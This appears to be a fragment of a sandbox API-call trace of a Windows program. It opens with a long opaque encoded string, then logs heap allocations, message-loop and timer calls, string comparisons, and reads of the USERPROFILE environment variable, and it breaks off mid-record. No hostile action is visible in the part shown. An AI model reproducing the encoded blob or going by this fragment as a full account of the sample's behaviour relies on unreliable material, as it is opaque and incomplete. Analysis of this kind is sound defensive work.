\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0209.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0209.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0209.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0209.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0209.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0209.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0209.092] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 1 [0209.092] TranslateMessage (lpMsg=0x8bf970) returned 0 [0209.092] DispatchMessageW (lpMsg=0x8bf970) returned 0x0 [0209.092] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0209.092] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0209.092] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0209.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0209.093] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0209.093] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0209.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0209.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0209.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0209.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0209.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0209.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0209.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0209.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0209.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0209.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0209.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0209.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0209.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0209.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Deployment", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eployment", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ployment", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="loyment", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oyment", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yment", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0209.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0209.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0209.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0209.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0209.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0209.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0209.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0209.098] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0209.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0209.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0209.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0209.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0209.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0209.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0209.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0209.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0209.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0209.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0209.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0209.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0209.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0209.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0209.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0209.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0209.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0209.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0209.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466df0 [0209.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0209.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Deployment", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eployment", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ployment", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="loyment", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.099] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oyment", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0209.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0209.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0209.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0209.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0209.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0209.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0209.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0209.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0209.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0209.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0209.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0209.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0209.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0209.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0209.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0209.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0209.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0209.100] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0209.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0209.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0209.100] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0209.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0209.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0209.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0209.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16e8 [0209.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0209.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0209.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0209.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0209.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0209.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0209.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0209.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0209.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0209.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0209.101] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0209.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0209.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa838 [0209.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0209.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0209.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7d8 [0209.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0209.102] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0209.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0209.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0209.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0209.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0209.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0209.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0209.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0209.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0209.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0209.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0209.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0209.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0209.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0209.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0209.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0209.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0209.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0209.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0209.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0209.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0209.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0209.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0209.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0209.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0209.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0209.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0209.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1438 [0209.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0209.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0209.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0209.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0209.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0209.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0209.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0209.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0209.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0209.104] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0209.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0209.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa658 [0209.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0209.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0209.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7d8 [0209.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0209.104] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0209.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0209.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0209.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0209.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0209.105] HeapFree (in: 